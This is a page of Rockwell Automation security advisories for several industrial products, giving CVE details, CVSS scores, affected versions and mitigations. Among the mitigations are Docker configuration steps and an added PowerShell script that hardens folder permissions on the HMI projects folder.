CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Known Exploited Vulnerability (KEV) database: No

 

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

Mitigations and Workarounds

Customers using the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices where possible.

·       Security Best Practices

High
SD1713 | Multiple Code Execution Vulnerabilities in Arena®
Published Date:
December 04, 2024
Last Updated:
December 19, 2024
CVE IDs:
CVE-2024-11155, CVE-2024-11156, CVE-2024-11158, CVE-2024-12130, CVE-2024-11157, CVE-2024-12672, CVE-2024-11364, CVE-2024-12175
CVSS Scores (v3.1):
7.8
CVSS Scores (v4.0):
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Revision Number: 2

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | Affected Software Version | Corrected in Software Version
Software - Arena® | CVE-2024-11155 | All versions 16.20.00 and prior | V16.20.06 and later
Software - Arena® | CVE-2024-11156 | All versions 16.20.03 and prior | V16.20.06 and later
Software - Arena® | CVE-2024-11158 | All versions 16.20.00 and prior | V16.20.06 and later
Software - Arena® | CVE-2024-12130 | All versions 16.20.05 and prior | V16.20.06 and later
Software - Arena® | CVE-2024-11157 | All versions 16.20.06 and prior | V16.20.07 and later
Software - Arena® | CVE-2024-12175 | All versions 16.20.06 and prior | V16.20.07 and later
Software - Arena® 32 bit | CVE-2024-12672 | All versions 16.20.07 and prior | n/a – see mitigations
Software - Arena® 32 bit | CVE-2024-11364 | All versions 16.20.06 and prior | V16.20.07 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported by ZDI (Zero Day Initiative).

CVE-2024-11155 IMPACT

A use-after-free code execution vulnerability exists in the affected products. A threat actor could craft a DOE file that forces the software to use memory after it has been freed and, if exploited, execute arbitrary code. To exploit this vulnerability, a legitimate user must open the malicious DOE file crafted by the threat actor.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-416: Use After Free
Known Exploited Vulnerability (KEV) database: No

CVE-2024-11156 IMPACT

An out-of-bounds write code execution vulnerability exists in the affected products. A crafted DOE file could cause the software to write beyond the bounds of allocated memory and, if exploited, allow a threat actor to execute arbitrary code. To exploit this vulnerability, a legitimate user must open the malicious DOE file crafted by the threat actor.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-787: Out-of-bounds Write
Known Exploited Vulnerability (KEV) database: No

CVE-2024-11158 IMPACT

An uninitialized-variable code execution vulnerability exists in the affected products. A crafted DOE file could force the software to access a variable before it is initialized and, if exploited, allow a threat actor to execute arbitrary code. To exploit this vulnerability, a legitimate user must open the malicious DOE file crafted by the threat actor.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-665: Improper Initialization
Known Exploited Vulnerability (KEV) database: No

CVE-2024-12130 IMPACT

An out-of-bounds read code execution vulnerability exists in the affected products. A crafted DOE file could force the software to read beyond the bounds of allocated memory and, if exploited, allow a threat actor to execute arbitrary code. To exploit this vulnerability, a legitimate user must open the malicious DOE file crafted by the threat actor.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-125: Out-of-bounds Read
Known Exploited Vulnerability (KEV) database: No

CVE-2024-11157 IMPACT

A third-party vulnerability exists in the affected products. A crafted DOE file could cause the software to write beyond the bounds of allocated memory and, if exploited, allow a threat actor to execute arbitrary code. To exploit this vulnerability, a legitimate user must open the malicious DOE file crafted by the threat actor.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-787: Out-of-bounds Write
Known Exploited Vulnerability (KEV) database: No

CVE-2024-12672 IMPACT

A third-party vulnerability exists in the affected products. A crafted DOE file could cause the software to write beyond the bounds of allocated memory and, if exploited, allow a threat actor to execute arbitrary code. To exploit this vulnerability, a legitimate user must open the malicious DOE file crafted by the threat actor.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-1395: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

CVE-2024-11364 IMPACT

Another uninitialized-variable code execution vulnerability exists in the affected products. A crafted DOE file could force the software to access a variable before it is initialized and, if exploited, allow a threat actor to execute arbitrary code. To exploit this vulnerability, a legitimate user must open the malicious DOE file crafted by the threat actor.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-1395: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

CVE-2024-12175 IMPACT

Another use-after-free code execution vulnerability exists in the affected products. A crafted DOE file could force the software to use memory after it has been freed and, if exploited, allow a threat actor to execute arbitrary code. To exploit this vulnerability, a legitimate user must open the malicious DOE file crafted by the threat actor.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-416: Use After Free
Known Exploited Vulnerability (KEV) database: No

 

Mitigations and Workarounds
Customers using the affected software are encouraged to apply these risk mitigations, if possible.

  •       Do not load untrusted Arena® model files.
  •       Hold the control key down when loading files to help prevent the VBA file stream from loading.

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High
SD1712 | Third Party Remote Code Execution Vulnerability in Verve Reporting
Published Date:
November 14, 2024
Last Updated:
November 14, 2024
CVE IDs:
CVE-2024-37287
CVSS Scores (v3.1):
7.2
CVSS Scores (v4.0):
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Revision Number: 1.0

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Version(s) | Corrected in Software Revision
Verve Reporting | < V1.39 | V1.39

VULNERABILITY DETAILS 

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. 

CVE-2024-37287 IMPACT

Verve Reporting uses Kibana, which contains a remote code execution vulnerability: an attacker with access to the ML and Alerting connector features, as well as write access to internal ML indices, can trigger a prototype pollution vulnerability that ultimately leads to arbitrary code execution. Code execution is limited to the container.

CVSS 3.1 Base Score: 7.2
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.6
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-1395: Dependency on Vulnerable Third-Party Component
Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

Mitigations and Workarounds 

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability. 

  1. Restrict access to the built-in Verve account
    • Access to the built-in "verve" account should be limited to administrators who need to perform administrative functions, and the account should be used only for those functions. Separate accounts should be used for day-to-day work.
    • Change the password for the built-in "verve" account if it has been shared.
  2. Restrict privileges for other accounts
    • Verve Reporting ships with built-in roles to simplify the delegation of user permissions. Assigning a user the following two roles grants access to most Verve Reporting features (excluding user administration) without granting the permissions needed to exploit this vulnerability:
      • all-all
      • feature-all-all
  3. Disable machine learning
    • Machine learning can be disabled in the Elasticsearch configuration override. Contact Verve support for assistance if needed.
      1. Connect to the Reporting server via SSH or a terminal.
      2. Copy the Elasticsearch configuration override to the working directory:
         docker exec $(docker ps --filter "name=Reporting_elasticsearch" --format "{{ .ID }}") cat /usr/share/elasticsearch/config-templates/elasticsearch.override.yml > elasticsearch.override.yml
      3. Add the following line and save:
         xpack.ml.enabled: false
      4. Disable Verve Reporting from the Verve Software Manager.
      5. Update the Elasticsearch configuration override:
         docker config rm elasticsearchymloverride
         docker config create elasticsearchymloverride ./elasticsearch.override.yml
      6. Enable Verve Reporting from the Verve Software Manager and confirm that the application starts and "Machine Learning" is no longer listed in the main navigation bar under Analytics.
      7. Delete the copy of the Elasticsearch configuration override:
         rm elasticsearch.override.yml
  • Security Best Practices

 

High
SD1711 | Input Validation Vulnerability exists in Arena® Input Analyzer
Published Date:
November 14, 2024
Last Updated:
November 13, 2024
CVE IDs:
CVE-2024-6068
Products:
Arena® Input Analyzer
CVSS Scores (v3.1):
7.3
CVSS Scores (v4.0):
7.0
Revision Number:
1.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Revision Number: 1.0

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Software Version | Corrected in Software Version
Arena® Input Analyzer | 16.20.03 and prior | 16.20.04

VULNERABILITY DETAILS

This vulnerability was reported to Rockwell Automation by Michael Heinzl. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerability.

CVE-2024-6068 IMPACT

A memory corruption vulnerability exists in the affected products when parsing DFT files.  Local threat actors can exploit this issue to disclose information and to execute arbitrary code. To exploit this vulnerability a legitimate user must open a malicious DFT file.

CVSS 3.1 Base Score: 7.3
CVSS 3.1 Vector:  CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector:  CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-1284: Improper Validation of Specified Quantity in Input
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·       For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

High
SD1709 | FactoryTalk View ME Remote Code Execution Vulnerability via Project Save Path
Published Date:
November 12, 2024
Last Updated:
November 12, 2024
CVE IDs:
CVE-2024-37365
Products:
FactoryTalk View Machine Edition
CVSS Scores (v3.1):
7.3
CVSS Scores (v4.0):
7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Revision Number: 1.0

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving our customers' business and production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Revision | Corrected in Software Revision
FactoryTalk View ME | >= V14, when using default folder privileges | V15

 

Mitigations and Workarounds

Customers using the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices where possible.

·         To enhance security and prevent unauthorized modifications to HMI project files, harden the Windows OS by removing the INTERACTIVE group from the folder’s security properties.

·         Add specific users or user groups and assign their permissions to this folder using the least privileges principle. Users with read-only permission can still test run and run the FactoryTalk View ME Station.

·         Guidance can be found in FactoryTalk View ME v14 Help topic: “HMI projects folder settings”. It can be opened through FactoryTalk View ME Studio menu “help\Contents\FactoryTalk View ME Help\Create a Machine Edition application->Open applications->HMI project folder settings”.   Security Best Practices
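The folder hardening described above, as an added PowerShell example that is not part of the Rockwell advisory: it reports which broad principals (INTERACTIVE, Users, Everyone) hold write rights on the HMI projects folder, removes the INTERACTIVE entry, and grants least-privilege access instead. The folder path and the two group names are placeholders and assumptions; the advisory does not name them, so take the real path from the "HMI projects folder settings" help topic for your installation.

```powershell
# Added example, not Rockwell's code. Audit and harden the FactoryTalk View ME
# HMI projects folder ACL. $ProjectsFolder is a placeholder path; the two
# groups are assumed local groups you create for this purpose.
param(
    [string]$ProjectsFolder = 'C:\Path\To\HMI\Projects',   # placeholder
    [string]$EditorGroup    = 'HMIProjectEditors',         # assumed: may save projects
    [string]$OperatorGroup  = 'HMIOperators'               # assumed: read-only, runs ME Station
)

$broadPrincipals = @(
    'NT AUTHORITY\INTERACTIVE',
    'NT AUTHORITY\Authenticated Users',
    'BUILTIN\Users',
    'Everyone'
)

# Any Allow ACE for a broad principal that carries Write, Modify or FullControl
# is what lets an arbitrary local user alter project files and their macros.
function Get-BroadWriteAccess {
    param([string]$Path)
    $writeBits = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [System.Security.AccessControl.FileSystemRights]::FullControl
    (Get-Acl -Path $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $broadPrincipals -contains $_.IdentityReference.Value -and
        ($_.FileSystemRights -band $writeBits) -ne 0
    }
}

# Disable inheritance (keeping a copy of the inherited ACEs so nothing else
# changes), then drop every explicit ACE that names INTERACTIVE.
function Remove-InteractiveAccess {
    param([string]$Path)
    $acl = Get-Acl -Path $Path
    $acl.SetAccessRuleProtection($true, $true)
    Set-Acl -Path $Path -AclObject $acl

    $acl = Get-Acl -Path $Path
    $acl.Access |
        Where-Object { $_.IdentityReference.Value -eq 'NT AUTHORITY\INTERACTIVE' } |
        ForEach-Object { [void]$acl.RemoveAccessRule($_) }
    Set-Acl -Path $Path -AclObject $acl
}

# Least privilege: editors get Modify, operators get ReadAndExecute only.
# Per the advisory, read-only users can still test run and run ME Station.
function Grant-LeastPrivilege {
    param([string]$Path, [string]$Editors, [string]$Operators)
    $inherit = [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit'
    $prop    = [System.Security.AccessControl.PropagationFlags]::None
    $allow   = [System.Security.AccessControl.AccessControlType]::Allow
    $acl = Get-Acl -Path $Path
    $acl.AddAccessRule([System.Security.AccessControl.FileSystemAccessRule]::new(
        $Editors, [System.Security.AccessControl.FileSystemRights]::Modify, $inherit, $prop, $allow))
    $acl.AddAccessRule([System.Security.AccessControl.FileSystemAccessRule]::new(
        $Operators, [System.Security.AccessControl.FileSystemRights]::ReadAndExecute, $inherit, $prop, $allow))
    Set-Acl -Path $Path -AclObject $acl
}

Write-Host "Broad write access before hardening on $ProjectsFolder :"
Get-BroadWriteAccess -Path $ProjectsFolder | Format-Table IdentityReference, FileSystemRights -AutoSize

Remove-InteractiveAccess -Path $ProjectsFolder
Grant-LeastPrivilege -Path $ProjectsFolder -Editors $EditorGroup -Operators $OperatorGroup

Write-Host "Broad write access after hardening (expect no INTERACTIVE entry):"
Get-BroadWriteAccess -Path $ProjectsFolder | Format-Table IdentityReference, FileSystemRights -AutoSize
```

Run it from an elevated prompt; re-running the audit function later is a cheap way to detect the folder drifting back to its default permissions.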

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-37365 IMPACT

A remote code execution vulnerability exists in the affected product. The vulnerability allows users to save projects within the public directory allowing anyone with local access to modify and/or delete files. Additionally, a malicious user could potentially leverage this vulnerability to escalate their privileges by changing the macro to execute arbitrary code.

CVSS 3.1 Base Score: 7.3/10 

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.0/10

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-20: Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

Critical
SD1710 | FactoryTalk® Updater Multiple Vulnerabilities
Published Date:
November 12, 2024
Last Updated:
November 12, 2024
CVE IDs:
CVE-2024-10943, CVE-2024-10944, CVE-2024-10945
Products:
FactoryTalk Updater
CVSS Scores (v3.1):
9.1, 8.4, 7.3
CVSS Scores (v4.0):
9.1, 7.1, 7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Published Date: 11/12/2024
Last Updated: 11/12/2024
Revision Number: 1.0
CVSS Score: Multiple, see below

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | First Known in Software Version | Corrected in Software Version
FactoryTalk® Updater – Web Client | CVE-2024-10943 | v4.00.00 | v4.20.00
FactoryTalk® Updater – Client | CVE-2024-10944 | All versions | V4.20.00
FactoryTalk® Updater – Agent | CVE-2024-10945 | All versions | V4.20.00

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-10943 IMPACT

An authentication bypass vulnerability exists in the affected product. The vulnerability exists due to shared secrets across accounts and could allow a threat actor to impersonate a user if the threat actor is able to enumerate additional information required during authentication.

CVSS 3.1 Base Score: 9.1
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVSS 4.0 Base Score: 9.1
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

CWE: CWE-922: Insecure Storage of Sensitive Information
Known Exploited Vulnerability (KEV) database: No

CVE-2024-10944 IMPACT

A Remote Code Execution vulnerability exists in the affected product. The vulnerability requires a high level of permissions and exists due to improper input validation, resulting in the possibility of a malicious Updater Agent being deployed.

CVSS 3.1 Base Score: 8.4
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.1
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

CWE: CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Control access to the server where FactoryTalk® Updater is running.

  • Click the ‘Scan’ button, which will update the database.

CVE-2024-10945 IMPACT

A Local Privilege Escalation vulnerability exists in the affected product. The vulnerability requires a local, low privileged threat actor to replace certain files during update and exists due to a failure to perform proper security checks before installation.

CVSS 3.1 Base Score: 7.3
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-358: Improperly Implemented Security Check for Standard
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Critical
SD1708 | ThinManager® Multiple Vulnerabilities
Published Date:
October 25, 2024
Last Updated:
October 25, 2024
CVE IDs:
CVE-2024-10386, CVE-2024-10387
Products:
FactoryTalk ThinManager
CVSS Scores (v3.1):
9.8, 7.5
CVSS Scores (v4.0):
9.3, 8.7
Revision Number:
1
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

ThinManager® Multiple Vulnerabilities

Published Date: 10/25/2024 
Last Updated: 10/25/2024 
Revision Number: 1.0 
CVSS Score: Multiple, see below

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Version(s) | Corrected Version(s)
ThinManager® | 11.2.0-11.2.9 | 11.2.10
ThinManager® | 12.0.0-12.0.7 | 12.0.8
ThinManager® | 12.1.0-12.1.8 | 12.1.9
ThinManager® | 13.0.0-13.0.5 | 13.0.6
ThinManager® | 13.1.0-13.1.3 | 13.1.4
ThinManager® | 13.2.0-13.2.2 | 13.2.3
ThinManager® | 14.0.0 | 14.0.1

Available here: ThinManager Downloads

VULNERABILITY DETAILS

The security of our products is important to us as your chosen industrial automation supplier. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. These vulnerabilities were discovered and reported to Rockwell Automation by security researchers at Tenable Network Security.

CVE-2024-10386 IMPACT

An authentication vulnerability exists in the affected product. The vulnerability could allow a threat actor with network access to send crafted messages to the device, potentially resulting in database manipulation.

CVSS 3.1 Base Score: 9.8 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-306: Missing Authentication for Critical Function 
Known Exploited Vulnerability (KEV) database: No

CVE-2024-10387 IMPACT

A Denial-of-Service vulnerability exists in the affected product. The vulnerability could allow a threat actor with network access to send crafted messages to the device, potentially resulting in Denial-of-Service.

CVSS 3.1 Base Score: 7.5 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-125: Out-of-bounds Read 
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply these risk mitigations, if possible.

  • If able, navigate to the ThinManager® download site and upgrade to a corrected version of ThinManager®.

  • Implement network hardening for ThinManager® device(s) by limiting communications on TCP 2031 to only the devices that require a connection to ThinManager®.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High
SD1707 | ControlLogix Vulnerable to Denial of Service via CIP Messages
Published Date:
October 10, 2024
Last Updated:
October 10, 2024
CVE IDs:
CVE-2024-6207
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Revision Number:
1.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: October 10, 2024 
Last updated: October 10, 2024
Revision Number: 1.0
CVSS Score: v3.1: 7.5, v4.0: 8.7

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
ControlLogix® 5580 | V28.011 | V33.017, V34.014, V35.013, V36.011 and later
ControlLogix® 5580 Process | V33.011 | V33.017, V34.014, V35.013, V36.011 and later
GuardLogix 5580 | V31.011 | V33.017, V34.014, V35.013, V36.011 and later
CompactLogix 5380 | V28.011 | V33.017, V34.014, V35.013, V36.011 and later
Compact GuardLogix 5380 SIL 2 | V31.011 | V33.017, V34.014, V35.013, V36.011 and later
Compact GuardLogix 5380 SIL 3 | V32.013 | V33.017, V34.014, V35.013, V36.011 and later
CompactLogix 5480 | V32.011 | V33.017, V34.014, V35.013, V36.011 and later
FactoryTalk® Logix Echo | V33.011 | V34.014, V35.013, V36.011 and later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. The following vulnerability was reported to Rockwell Automation by Trevor Flynn.

CVE-2024-6207 IMPACT

A denial-of-service vulnerability exists in the affected products that causes the device to enter a major nonrecoverable fault (MNRF) when it receives an invalid CIP request. To exploit this vulnerability, a malicious user must chain this exploit with CVE-2021-22681 and send a specially crafted CIP message to the device. If exploited, a threat actor could prevent access by legitimate users and end connections to connected devices, including the workstation. To recover the controllers, a download is required, which ends any process that the controller is running.

CVSS Base Score v3.1: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score v4.0: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20: Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users of the affected software are also encouraged to apply security best practices to minimize the risk of the vulnerability.

  • Security Best Practices

ADDITIONAL RESOURCES

  • JSON CVE-2024-6207

High
SD1705 | PowerFlex 6000T CIP Security denial-of-service Vulnerability
Published Date:
October 07, 2024
Last Updated:
October 07, 2024
CVE IDs:
CVE-2024-9124
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 10/8/2024

Last Updated: 10/8/2024 

Revision Number: 1.0 
CVSS Score: 8.2/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Software Version | Corrected in Software Version
Drives - PowerFlex 6000T | 8.001, 8.002, 9.001 | 10.001

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-9124 IMPACT

A denial-of-service vulnerability exists in the PowerFlex® 6000T. If the device is overloaded with requests, it will become unavailable. The device may require a power cycle to recover it if it does not re-establish a connection after it stops receiving requests. 

CVSS 3.1 Base Score: 7.5 
CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.2 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: Improper Check for Unusual or Exceptional Conditions
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.    

  • Security Best Practices 

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

  • CVE-2024-9124 JSON

High
SD1706 | Logix Controllers Vulnerable to Denial-of-Service Vulnerability
Published Date:
October 07, 2024
Last Updated:
October 10, 2024
CVE IDs:
CVE-2024-8626
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Revision Number:
2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Logix Controllers Vulnerable to Denial-of-Service Vulnerability

Published Date: October 8, 2024

Last updated:  October 10, 2024

Revision Number: 2.0

CVSS Score: 8.7/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
CompactLogix 5380 controllers | v33.011 | v33.015 and later (for version 33); v34.011 and later
Compact GuardLogix® 5380 controllers | v33.011 | v33.015 and later (for version 33); v34.011 and later
CompactLogix 5480 controllers | v33.011 | v33.015 and later (for version 33); v34.011 and later
ControlLogix 5580 controllers | v33.011 | v33.015 and later (for version 33); v34.011 and later
GuardLogix 5580 controllers | v33.011 | v33.015 and later (for version 33); v34.011 and later
1756-EN4TR | v3.002 | 4.001 and later

Mitigations and Workarounds 

Customers using the affected versions are encouraged to upgrade to corrected firmware versions. We also strongly encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability. 

  • Security Best Practices

VULNERABILITY DETAILS

CVE-2024-8626 IMPACT

Due to a memory leak, a denial-of-service vulnerability exists in the affected products. A malicious actor could exploit this vulnerability by performing multiple actions on certain web pages of the product causing the affected products to become fully unavailable and require a power cycle to recover. 

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.  

CVSS Base Score: 7.5/10 (high) 

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

